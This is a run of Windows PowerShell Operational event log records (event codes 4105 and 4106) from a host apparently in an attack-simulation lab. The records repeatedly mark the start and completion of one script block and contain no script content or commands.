Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469133
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469132
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469131
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469130
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469129
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469128
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469127
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469126
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469125
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469124
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469123
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469122
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469121
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469120
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469119
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469118
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469117
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469116
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469115
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469114
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469113
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469112
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469111
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469110
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469109
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469108
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469107
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469106
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469105
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469104
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469103
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469102
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469101
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469100
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469099
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469098
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469097
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469096
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469095
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469094
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469093
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469092
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469091
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469090
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469089
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469088
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469087
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469086
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469085
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469084
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469083
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469082
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469081
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469080
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469079
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469078
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
